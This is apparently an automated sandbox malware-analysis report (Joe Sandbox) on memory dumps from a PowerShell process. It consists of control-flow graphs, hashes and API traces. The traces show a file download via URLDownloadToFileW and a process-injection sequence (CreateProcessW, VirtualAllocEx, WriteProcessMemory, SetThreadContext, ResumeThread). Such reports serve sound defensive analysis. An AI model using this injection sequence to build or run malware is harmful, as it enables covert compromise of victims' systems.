                                                                              control_flow_graph 0 79e1f40-79e1f65 1 79e1f6b-79e1f70 0->1 2 79e2158-79e2174 0->2 3 79e1f88-79e1f8c 1->3 4 79e1f72-79e1f78 1->4 10 79e213b-79e2155 2->10 11 79e2176 2->11 8 79e2108-79e2112 3->8 9 79e1f92-79e1f94 3->9 6 79e1f7c-79e1f86 4->6 7 79e1f7a 4->7 6->3 7->3 12 79e2114-79e211d 8->12 13 79e2120-79e2126 8->13 14 79e1f96-79e1fa2 9->14 15 79e1fa4 9->15 17 79e2178-79e217e 11->17 18 79e2180-79e21a2 11->18 19 79e212c-79e2138 13->19 20 79e2128-79e212a 13->20 16 79e1fa6-79e1fa8 14->16 15->16 16->8 22 79e1fae-79e1fcd 16->22 17->18 25 79e21a8-79e21ad 18->25 26 79e2326-79e233e 18->26 24 79e213a 19->24 20->24 53 79e1fcf-79e1fdb 22->53 54 79e1fdd 22->54 24->10 28 79e21af-79e21b5 25->28 29 79e21c5-79e21c9 25->29 38 79e2348-79e236a 26->38 39 79e2340-79e2341 26->39 36 79e21b9-79e21c3 28->36 37 79e21b7 28->37 34 79e21cf-79e21d1 29->34 35 79e22d8-79e22e2 29->35 40 79e21d3-79e21df 34->40 41 79e21e1 34->41 42 79e22ef-79e22f5 35->42 43 79e22e4-79e22ec 35->43 36->29 37->29 49 79e2480-79e24b5 38->49 50 79e2370-79e2375 38->50 46 79e22d5 39->46 47 79e2343-79e2346 39->47 48 79e21e3-79e21e5 40->48 41->48 51 79e22fb-79e2307 42->51 52 79e22f7-79e22f9 42->52 47->38 48->35 55 79e21eb-79e220a 48->55 73 79e24b7-79e24d9 49->73 74 79e24e3-79e24ed 49->74 56 79e238d-79e2391 50->56 57 79e2377-79e237d 50->57 58 79e2309-79e2323 51->58 52->58 59 79e1fdf-79e1fe1 53->59 54->59 97 79e220c-79e2218 55->97 98 79e221a 55->98 63 79e2397-79e2399 56->63 64 79e2432-79e243c 56->64 60 79e237f 57->60 61 79e2381-79e238b 57->61 59->8 68 79e1fe7-79e1fee 59->68 60->56 61->56 71 79e239b-79e23a7 63->71 72 79e23a9 63->72 66 79e243e-79e2446 64->66 67 79e2449-79e244f 64->67 76 79e2455-79e2461 67->76 77 79e2451-79e2453 67->77 68->2 80 79e1ff4-79e1ff9 68->80 75 79e23ab-79e23ad 71->75 72->75 110 79e252d-79e2556 73->110 111 79e24db-79e24e0 73->111 78 79e24ef-79e24f4 74->78 79 79e24f7-79e24fd 74->79 75->64 84 79e23b3-79e23b5 75->84 85 79e2463-79e247d 76->85 77->85 86 79e24ff-79e2501 79->86 87 79e2503-79e250f 79->87 88 79e1ffb-79e2001 80->88 89 79e2011-79e2020 80->89 91 79e23cf-79e23d6 84->91 92 79e23b7-79e23bd 84->92 94 79e2511-79e252a 86->94 87->94 95 79e2005-79e200f 88->95 96 79e2003 88->96 89->8 116 79e2026-79e2044 89->116 102 79e23ee-79e242f 91->102 103 79e23d8-79e23de 91->103 100 79e23bf 92->100 101 79e23c1-79e23cd 92->101 95->89 96->89 107 79e221c-79e221e 97->107 98->107 100->91 101->91 112 79e23e2-79e23ec 103->112 113 79e23e0 103->113 107->35 108 79e2224-79e225b 107->108 132 79e225d-79e2263 108->132 133 79e2275-79e227c 108->133 128 79e2558-79e257e 110->128 129 79e2585-79e25b4 110->129 112->102 113->102 116->8 127 79e204a-79e206f 116->127 127->8 152 79e2075-79e207c 127->152 128->129 140 79e25ed-79e25f7 129->140 141 79e25b6-79e25d3 129->141 136 79e2267-79e2273 132->136 137 79e2265 132->137 138 79e227e-79e2284 133->138 139 79e2294-79e22d4 133->139 136->133 137->133 147 79e2288-79e2292 138->147 148 79e2286 138->148 139->46 143 79e25f9-79e25fd 140->143 144 79e2600-79e2606 140->144 155 79e263d-79e2642 141->155 156 79e25d5-79e25e7 141->156 150 79e260c-79e2618 144->150 151 79e2608-79e260a 144->151 147->139 148->139 157 79e261a-79e263a 150->157 151->157 158 79e207e-79e2099 152->158 159 79e20c2-79e20f5 152->159 155->156 156->140 165 79e209b-79e20a1 158->165 166 79e20b3-79e20b7 158->166 172 79e20fc-79e2105 159->172 168 79e20a5-79e20b1 165->168 169 79e20a3 165->169 171 79e20be-79e20c0 166->171 168->166 169->166 171->172
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1832773158.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_79e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                              • API String ID: 0-1420252700
                                                                              • Opcode ID: 119aaa1ddb2be1259011dd5c7ce1b60e7e7dcceffab08bcde07f85730899b63b
                                                                              • Instruction ID: 0cd1e4e0463ea289bc959cddf0a9071008db39623c495713ad3e050ce5a63e4f
                                                                              • Opcode Fuzzy Hash: 119aaa1ddb2be1259011dd5c7ce1b60e7e7dcceffab08bcde07f85730899b63b
                                                                              • Instruction Fuzzy Hash: 221258B17043158FCB268B688C1076ABFAEBFD5318F1484AAD501CF392DE31C986C791

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 257 34d1c00-34d7e52 260 34d7e5d-34d7e63 257->260 261 34d7e54-34d7e5a 257->261 262 34d7e65-34d7e6e 260->262 263 34d7e71-34d7ea6 URLDownloadToFileW 260->263 261->260 262->263 264 34d7eaf-34d7ec3 263->264 265 34d7ea8-34d7eae 263->265 265->264
                                                                              APIs
                                                                              • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 034D7E99
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1827140039.00000000034D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_34d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: DownloadFile
                                                                              • String ID: 5-'j
                                                                              • API String ID: 1407266417-2709927967
                                                                              • Opcode ID: ddcb55b8a26900a480c1353c038ab859149b20c1ed1a34ab64e5cfa1acc0dec1
                                                                              • Instruction ID: 34a0112700a5fcde462a91ebe662d782e72c448597b73362d0f7b7092a23286d
                                                                              • Opcode Fuzzy Hash: ddcb55b8a26900a480c1353c038ab859149b20c1ed1a34ab64e5cfa1acc0dec1
                                                                              • Instruction Fuzzy Hash: 402102B1D01259EFCB00CF9AD984BDEFBB4FB48310F14852AE918A7210D374AA54CBA4

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 267 79e4610-79e463b 269 79e4af2-79e4b25 267->269 270 79e4641-79e4646 267->270 278 79e4b27-79e4b33 269->278 279 79e4b35 269->279 271 79e465e-79e4663 270->271 272 79e4648-79e464e 270->272 274 79e4665-79e4671 271->274 275 79e4673 271->275 276 79e4652-79e465c 272->276 277 79e4650 272->277 280 79e4675-79e4677 274->280 275->280 276->271 277->271 282 79e4b37-79e4b39 278->282 279->282 283 79e467d-79e4687 280->283 284 79e4a93-79e4a9d 280->284 287 79e4b7b-79e4b85 282->287 288 79e4b3b-79e4b42 282->288 283->269 289 79e468d-79e4692 283->289 285 79e4a9f-79e4aa8 284->285 286 79e4aab-79e4ab1 284->286 290 79e4ab7-79e4ac3 286->290 291 79e4ab3-79e4ab5 286->291 295 79e4b8e-79e4b94 287->295 296 79e4b87-79e4b8b 287->296 288->287 292 79e4b44-79e4b61 288->292 293 79e46aa-79e46b8 289->293 294 79e4694-79e469a 289->294 297 79e4ac5-79e4aef 290->297 291->297 308 79e4bc9-79e4bce 292->308 309 79e4b63-79e4b75 292->309 293->284 306 79e46be-79e46dd 293->306 298 79e469e-79e46a8 294->298 299 79e469c 294->299 300 79e4b9a-79e4ba6 295->300 301 79e4b96-79e4b98 295->301 298->293 299->293 302 79e4ba8-79e4bc6 300->302 301->302 306->284 318 79e46e3-79e46ed 306->318 308->309 309->287 318->269 319 79e46f3-79e46f8 318->319 320 79e46fa-79e4700 319->320 321 79e4710-79e4714 319->321 322 79e4704-79e470e 320->322 323 79e4702 320->323 321->284 324 79e471a-79e471e 321->324 322->321 323->321 324->284 325 79e4724-79e4728 324->325 325->284 327 79e472e-79e473e 325->327 328 79e47c6-79e4815 327->328 329 79e4744-79e476b 327->329 346 79e481c-79e482f 328->346 334 79e476d-79e4773 329->334 335 79e4785-79e47b3 329->335 336 79e4777-79e4783 334->336 337 79e4775 334->337 344 79e47b5-79e47b7 335->344 345 79e47c1-79e47c4 335->345 336->335 337->335 344->345 345->346 347 79e48b7-79e4906 346->347 348 79e4835-79e485c 346->348 365 79e490d-79e4920 347->365 353 79e485e-79e4864 348->353 354 79e4876-79e48a4 348->354 355 79e4868-79e4874 353->355 356 79e4866 353->356 363 79e48a6-79e48a8 354->363 364 79e48b2-79e48b5 354->364 355->354 356->354 363->364 364->365 366 79e49a8-79e49f7 365->366 367 79e4926-79e494d 365->367 384 79e49fe-79e4a2c 366->384 372 79e494f-79e4955 367->372 373 79e4967-79e4995 367->373 374 79e4959-79e4965 372->374 375 79e4957 372->375 382 79e4997-79e4999 373->382 383 79e49a3-79e49a6 373->383 374->373 375->373 382->383 383->384 389 79e4a2f call 34d7a08 384->389 390 79e4a2f call 34d7a18 384->390 391 79e4a2f call 34d7da8 384->391 392 79e4a2f call 34d7c45 384->392 393 79e4a2f call 34d1c00 384->393 387 79e4a34-79e4a90 389->387 390->387 391->387 392->387 393->387
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1832773158.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_79e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: 400ff219f4fcdf2febbe45e71b0ed485e70d49da030596dc431241448f0e974d
                                                                              • Instruction ID: 6661ad8d4da37bf490c222f16dbfe2a1a4db146813f336e8166a39a9c18ca31e
                                                                              • Opcode Fuzzy Hash: 400ff219f4fcdf2febbe45e71b0ed485e70d49da030596dc431241448f0e974d
                                                                              • Instruction Fuzzy Hash: C9F108B0B003459FCB159F68D804A6ABBAAFFC9714F148869F9059F360DA72DC85CB91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 394 79e04f8-79e050a 395 79e05ca-79e05fd 394->395 396 79e0510-79e0521 394->396 401 79e05ff-79e063e 395->401 402 79e066b-79e0675 395->402 399 79e053b-79e0558 396->399 400 79e0523-79e0529 396->400 399->395 412 79e055a-79e057c 399->412 403 79e052d-79e0539 400->403 404 79e052b 400->404 421 79e06bb-79e06c0 401->421 422 79e0640-79e064e 401->422 405 79e0677-79e067d 402->405 406 79e0680-79e0686 402->406 403->399 404->399 409 79e068c-79e0698 406->409 410 79e0688-79e068a 406->410 411 79e069a-79e06b8 409->411 410->411 419 79e057e-79e0584 412->419 420 79e0596-79e05ae 412->420 424 79e0588-79e0594 419->424 425 79e0586 419->425 430 79e05bc-79e05c7 420->430 431 79e05b0-79e05b2 420->431 421->422 432 79e0656-79e0665 422->432 424->420 425->420 431->430 432->402
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1832773158.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_79e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: 840aa4778f1a6b19c99905fee52e5e91a15f2ff66accf9ee707f7de8b48b4182
                                                                              • Instruction ID: 8e757ec613217320c20ef8e8bb5c7b1eb44171840b61a66155c3a0953997b162
                                                                              • Opcode Fuzzy Hash: 840aa4778f1a6b19c99905fee52e5e91a15f2ff66accf9ee707f7de8b48b4182
                                                                              • Instruction Fuzzy Hash: 3B515CB1B04315AFC7118B6D881072ABFE9AFC5714F24885AE549DF381CAB1DC85C7A1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 433 79e45f5-79e4606 434 79e4608-79e460a 433->434 435 79e4610-79e4613 433->435 436 79e460c-79e460e 434->436 437 79e4614-79e463b 434->437 435->437 436->435 438 79e4af2-79e4b25 437->438 439 79e4641-79e4646 437->439 447 79e4b27-79e4b33 438->447 448 79e4b35 438->448 440 79e465e-79e4663 439->440 441 79e4648-79e464e 439->441 443 79e4665-79e4671 440->443 444 79e4673 440->444 445 79e4652-79e465c 441->445 446 79e4650 441->446 449 79e4675-79e4677 443->449 444->449 445->440 446->440 451 79e4b37-79e4b39 447->451 448->451 452 79e467d-79e4687 449->452 453 79e4a93-79e4a9d 449->453 456 79e4b7b-79e4b85 451->456 457 79e4b3b-79e4b42 451->457 452->438 458 79e468d-79e4692 452->458 454 79e4a9f-79e4aa8 453->454 455 79e4aab-79e4ab1 453->455 459 79e4ab7-79e4ac3 455->459 460 79e4ab3-79e4ab5 455->460 464 79e4b8e-79e4b94 456->464 465 79e4b87-79e4b8b 456->465 457->456 461 79e4b44-79e4b61 457->461 462 79e46aa-79e46b8 458->462 463 79e4694-79e469a 458->463 466 79e4ac5-79e4aef 459->466 460->466 477 79e4bc9-79e4bce 461->477 478 79e4b63-79e4b75 461->478 462->453 475 79e46be-79e46dd 462->475 467 79e469e-79e46a8 463->467 468 79e469c 463->468 469 79e4b9a-79e4ba6 464->469 470 79e4b96-79e4b98 464->470 467->462 468->462 471 79e4ba8-79e4bc6 469->471 470->471 475->453 487 79e46e3-79e46ed 475->487 477->478 478->456 487->438 488 79e46f3-79e46f8 487->488 489 79e46fa-79e4700 488->489 490 79e4710-79e4714 488->490 491 79e4704-79e470e 489->491 492 79e4702 489->492 490->453 493 79e471a-79e471e 490->493 491->490 492->490 493->453 494 79e4724-79e4728 493->494 494->453 496 79e472e-79e473e 494->496 497 79e47c6-79e4815 496->497 498 79e4744-79e476b 496->498 515 79e481c-79e482f 497->515 503 79e476d-79e4773 498->503 504 79e4785-79e47b3 498->504 505 79e4777-79e4783 503->505 506 79e4775 503->506 513 79e47b5-79e47b7 504->513 514 79e47c1-79e47c4 504->514 505->504 506->504 513->514 514->515 516 79e48b7-79e4906 515->516 517 79e4835-79e485c 515->517 534 79e490d-79e4920 516->534 522 79e485e-79e4864 517->522 523 79e4876-79e48a4 517->523 524 79e4868-79e4874 522->524 525 79e4866 522->525 532 79e48a6-79e48a8 523->532 533 79e48b2-79e48b5 523->533 524->523 525->523 532->533 533->534 535 79e49a8-79e49f7 534->535 536 79e4926-79e494d 534->536 553 79e49fe-79e4a2c 535->553 541 79e494f-79e4955 536->541 542 79e4967-79e4995 536->542 543 79e4959-79e4965 541->543 544 79e4957 541->544 551 79e4997-79e4999 542->551 552 79e49a3-79e49a6 542->552 543->542 544->542 551->552 552->553 558 79e4a2f call 34d7a08 553->558 559 79e4a2f call 34d7a18 553->559 560 79e4a2f call 34d7da8 553->560 561 79e4a2f call 34d7c45 553->561 562 79e4a2f call 34d1c00 553->562 556 79e4a34-79e4a90 558->556 559->556 560->556 561->556 562->556
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1832773158.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_79e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q
                                                                              • API String ID: 0-2862610199
                                                                              • Opcode ID: 92cc71afa805a2ce55a5c0dcff8a4d6480fd22b7c4f4163569eb2820355fb048
                                                                              • Instruction ID: 6e129420cc2181ea6bfbd898429b6ba99c392443f7ae7f4b8f07a75e6a97973a
                                                                              • Opcode Fuzzy Hash: 92cc71afa805a2ce55a5c0dcff8a4d6480fd22b7c4f4163569eb2820355fb048
                                                                              • Instruction Fuzzy Hash: B291B3B4B002459BCF15CF58C444B69BBBAFB88714F258869F905AF360D772EC85CB91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 906 79e1f25-79e1f36 907 79e1f38-79e1f3e 906->907 908 79e1f40-79e1f65 906->908 907->908 909 79e1f6b-79e1f70 908->909 910 79e2158-79e2174 908->910 911 79e1f88-79e1f8c 909->911 912 79e1f72-79e1f78 909->912 918 79e213b-79e2155 910->918 919 79e2176 910->919 916 79e2108-79e2112 911->916 917 79e1f92-79e1f94 911->917 914 79e1f7c-79e1f86 912->914 915 79e1f7a 912->915 914->911 915->911 920 79e2114-79e211d 916->920 921 79e2120-79e2126 916->921 922 79e1f96-79e1fa2 917->922 923 79e1fa4 917->923 925 79e2178-79e217e 919->925 926 79e2180-79e21a2 919->926 927 79e212c-79e2138 921->927 928 79e2128-79e212a 921->928 924 79e1fa6-79e1fa8 922->924 923->924 924->916 930 79e1fae-79e1fcd 924->930 925->926 933 79e21a8-79e21ad 926->933 934 79e2326-79e233e 926->934 932 79e213a 927->932 928->932 961 79e1fcf-79e1fdb 930->961 962 79e1fdd 930->962 932->918 936 79e21af-79e21b5 933->936 937 79e21c5-79e21c9 933->937 946 79e2348-79e236a 934->946 947 79e2340-79e2341 934->947 944 79e21b9-79e21c3 936->944 945 79e21b7 936->945 942 79e21cf-79e21d1 937->942 943 79e22d8-79e22e2 937->943 948 79e21d3-79e21df 942->948 949 79e21e1 942->949 950 79e22ef-79e22f5 943->950 951 79e22e4-79e22ec 943->951 944->937 945->937 957 79e2480-79e24b5 946->957 958 79e2370-79e2375 946->958 954 79e22d5 947->954 955 79e2343-79e2346 947->955 956 79e21e3-79e21e5 948->956 949->956 959 79e22fb-79e2307 950->959 960 79e22f7-79e22f9 950->960 955->946 956->943 963 79e21eb-79e220a 956->963 981 79e24b7-79e24d9 957->981 982 79e24e3-79e24ed 957->982 964 79e238d-79e2391 958->964 965 79e2377-79e237d 958->965 966 79e2309-79e2323 959->966 960->966 967 79e1fdf-79e1fe1 961->967 962->967 1005 79e220c-79e2218 963->1005 1006 79e221a 963->1006 971 79e2397-79e2399 964->971 972 79e2432-79e243c 964->972 968 79e237f 965->968 969 79e2381-79e238b 965->969 967->916 976 79e1fe7-79e1fee 967->976 968->964 969->964 979 79e239b-79e23a7 971->979 980 79e23a9 971->980 974 79e243e-79e2446 972->974 975 79e2449-79e244f 972->975 984 79e2455-79e2461 975->984 985 79e2451-79e2453 975->985 976->910 988 79e1ff4-79e1ff9 976->988 983 79e23ab-79e23ad 979->983 980->983 1018 79e252d-79e2556 981->1018 1019 79e24db-79e24e0 981->1019 986 79e24ef-79e24f4 982->986 987 79e24f7-79e24fd 982->987 983->972 992 79e23b3-79e23b5 983->992 993 79e2463-79e247d 984->993 985->993 994 79e24ff-79e2501 987->994 995 79e2503-79e250f 987->995 996 79e1ffb-79e2001 988->996 997 79e2011-79e2020 988->997 999 79e23cf-79e23d6 992->999 1000 79e23b7-79e23bd 992->1000 1002 79e2511-79e252a 994->1002 995->1002 1003 79e2005-79e200f 996->1003 1004 79e2003 996->1004 997->916 1024 79e2026-79e2044 997->1024 1010 79e23ee-79e242f 999->1010 1011 79e23d8-79e23de 999->1011 1008 79e23bf 1000->1008 1009 79e23c1-79e23cd 1000->1009 1003->997 1004->997 1015 79e221c-79e221e 1005->1015 1006->1015 1008->999 1009->999 1020 79e23e2-79e23ec 1011->1020 1021 79e23e0 1011->1021 1015->943 1016 79e2224-79e225b 1015->1016 1040 79e225d-79e2263 1016->1040 1041 79e2275-79e227c 1016->1041 1036 79e2558-79e257e 1018->1036 1037 79e2585-79e25b4 1018->1037 1020->1010 1021->1010 1024->916 1035 79e204a-79e206f 1024->1035 1035->916 1060 79e2075-79e207c 1035->1060 1036->1037 1048 79e25ed-79e25f7 1037->1048 1049 79e25b6-79e25d3 1037->1049 1044 79e2267-79e2273 1040->1044 1045 79e2265 1040->1045 1046 79e227e-79e2284 1041->1046 1047 79e2294-79e22d4 1041->1047 1044->1041 1045->1041 1055 79e2288-79e2292 1046->1055 1056 79e2286 1046->1056 1047->954 1051 79e25f9-79e25fd 1048->1051 1052 79e2600-79e2606 1048->1052 1063 79e263d-79e2642 1049->1063 1064 79e25d5-79e25e7 1049->1064 1058 79e260c-79e2618 1052->1058 1059 79e2608-79e260a 1052->1059 1055->1047 1056->1047 1065 79e261a-79e263a 1058->1065 1059->1065 1066 79e207e-79e2099 1060->1066 1067 79e20c2-79e20f5 1060->1067 1063->1064 1064->1048 1073 79e209b-79e20a1 1066->1073 1074 79e20b3-79e20b7 1066->1074 1080 79e20fc-79e2105 1067->1080 1076 79e20a5-79e20b1 1073->1076 1077 79e20a3 1073->1077 1079 79e20be-79e20c0 1074->1079 1076->1074 1077->1074 1079->1080
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1832773158.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_79e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: de90b3bfd100b2d1e6e067e0bdc9e8aa413b2ec76f12ba7339322564f0b59a1e
                                                                              • Instruction ID: e9f2fcdeb8adeef80b08182b2c4ec66842eef1681a715a9efe9b86283575ad23
                                                                              • Opcode Fuzzy Hash: de90b3bfd100b2d1e6e067e0bdc9e8aa413b2ec76f12ba7339322564f0b59a1e
                                                                              • Instruction Fuzzy Hash: ED4117F0A44306DFCB22CB148D01B6D7BBEBB95319F5984A5D604DF292D731CA81CBA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1832773158.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_79e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-1608119003
                                                                              • Opcode ID: 45fba321271cadff254201b830f8bfe1d968a1d7cabf34009aaea8debf862c54
                                                                              • Instruction ID: 1fc45c2e2dee877dcec65464b66e641f78bc7c960c8f1bb39b87d2ef2b42d5af
                                                                              • Opcode Fuzzy Hash: 45fba321271cadff254201b830f8bfe1d968a1d7cabf34009aaea8debf862c54
                                                                              • Instruction Fuzzy Hash: 97F16BB1B4031A8FCB168A6898006AABBEEEFD5714F18847AD445CF351DF32DD46C791
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1832773158.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_79e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                              • API String ID: 0-445857065
                                                                              • Opcode ID: 4866d6971d518bd26e0aad825d4c8a94a4ab3b1d110be1745b748df9e58f6598
                                                                              • Instruction ID: e5a57ce2e2e89c05290957416a9a353088d91df66726632437ac0824208a3311
                                                                              • Opcode Fuzzy Hash: 4866d6971d518bd26e0aad825d4c8a94a4ab3b1d110be1745b748df9e58f6598
                                                                              • Instruction Fuzzy Hash: BBC13AB1B04356CFC7169A68C81077ABBEAAFC5214F1884BAD546CF351DF32D886C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1832773158.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_79e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                              • API String ID: 0-1420252700
                                                                              • Opcode ID: 2d57d6ae3f66f3c3f3b85c2a44a167775d725755abd70d0d139757e4cc048325
                                                                              • Instruction ID: 41aacbe5d0f6b1d7093145714c8d4ab9dd2e6861c05906679081b14555644fca
                                                                              • Opcode Fuzzy Hash: 2d57d6ae3f66f3c3f3b85c2a44a167775d725755abd70d0d139757e4cc048325
                                                                              • Instruction Fuzzy Hash: 278138B1B04346DFCB168B69D4446AABBFAFF86314F1484BBD405CB252DB31C885CBA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1832773158.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_79e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 7acb2e3c3080d15c1168e23ad5abac7bcfb78c12f756b51a0f9ba4748ab7220b
                                                                              • Instruction ID: 09f975341a6f0830c9738fa3cf0221bfdbe13a4344535c2ca05fae4fc17c3826
                                                                              • Opcode Fuzzy Hash: 7acb2e3c3080d15c1168e23ad5abac7bcfb78c12f756b51a0f9ba4748ab7220b
                                                                              • Instruction Fuzzy Hash: 04216BB1700316ABDB35857ADC01B37AADE9BD4B19F64883AA409CF385DD72C8458761
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1832773158.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_79e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: eae9026c311c5f4132249c6ccbdb58b51e32dadf1cc3db9ae476c6c6355c57f6
                                                                              • Instruction ID: 0d4b72e147936e16f87e7ecf45cc4e4361e3b46de00cb4e4783498653f9dbf63
                                                                              • Opcode Fuzzy Hash: eae9026c311c5f4132249c6ccbdb58b51e32dadf1cc3db9ae476c6c6355c57f6
                                                                              • Instruction Fuzzy Hash: 4C01F4A0B093954FC72B126C1C205295FBA7FD261233A84ABC081DF39BCD958C4AC3A6

                                                                              Execution Graph

                                                                              Execution Coverage:8.9%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:42.6%
                                                                              Total number of Nodes:61
                                                                              Total number of Limit Nodes:18
                                                                              execution_graph 10451 42f81a7 10453 42f817e 10451->10453 10452 42f8264 10453->10452 10456 42fb870 10453->10456 10454 42f82f2 10457 42fb896 10456->10457 10458 42fb88f 10456->10458 10457->10458 10461 42fbd6e 10457->10461 10483 42fb870 8 API calls 10457->10483 10484 42fbdd0 10457->10484 10458->10454 10459 42fbd7c 10459->10454 10460 42fcb05 CreateProcessW 10463 42fcb79 10460->10463 10461->10459 10467 42fc6c3 10461->10467 10507 42f75a4 10461->10507 10464 42fbf59 10465 42f75b0 Wow64SetThreadContext 10464->10465 10464->10467 10466 42fc03a 10465->10466 10466->10467 10468 42fc1dc VirtualAllocEx 10466->10468 10476 42fc6de 10466->10476 10467->10460 10467->10476 10469 42fc225 10468->10469 10469->10467 10471 42fc2d2 VirtualAllocEx 10469->10471 10472 42fc319 10469->10472 10470 42f75c8 WriteProcessMemory 10473 42fc363 10470->10473 10471->10472 10472->10467 10472->10470 10472->10476 10473->10467 10474 42fc56f 10473->10474 10473->10476 10480 42f75c8 WriteProcessMemory 10473->10480 10474->10467 10475 42f75c8 WriteProcessMemory 10474->10475 10477 42fc5b7 10475->10477 10476->10454 10477->10467 10477->10476 10478 42f75d4 Wow64SetThreadContext 10477->10478 10479 42fc66e 10478->10479 10479->10467 10479->10476 10481 42fc683 ResumeThread 10479->10481 10480->10473 10481->10467 10483->10457 10486 42fbe52 10484->10486 10485 42fcb05 CreateProcessW 10488 42fcb79 10485->10488 10487 42f75a4 CreateProcessW 10486->10487 10492 42fc6c3 10486->10492 10489 42fbf59 10487->10489 10489->10492 10511 42f75b0 10489->10511 10491 42fc03a 10491->10492 10493 42fc1dc VirtualAllocEx 10491->10493 10500 42fc6de 10491->10500 10492->10485 10492->10500 10494 42fc225 10493->10494 10494->10492 10496 42fc2d2 VirtualAllocEx 10494->10496 10497 42fc319 10494->10497 10496->10497 10497->10492 10497->10500 10515 42f75c8 10497->10515 10498 42fc363 10498->10492 10499 42fc56f 10498->10499 10498->10500 10505 42f75c8 WriteProcessMemory 10498->10505 10499->10492 10501 42f75c8 WriteProcessMemory 10499->10501 10500->10457 10502 42fc5b7 10501->10502 10502->10492 10502->10500 10519 42f75d4 10502->10519 10505->10498 10506 42fc683 ResumeThread 10506->10492 10508 42fca20 CreateProcessW 10507->10508 10510 42fcb79 10508->10510 10512 42fcc60 Wow64SetThreadContext 10511->10512 10514 42fccda 10512->10514 10514->10491 10516 42fd1d8 WriteProcessMemory 10515->10516 10518 42fd263 10516->10518 10518->10498 10520 42fcc60 Wow64SetThreadContext 10519->10520 10522 42fc66e 10520->10522 10522->10492 10522->10500 10522->10506
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
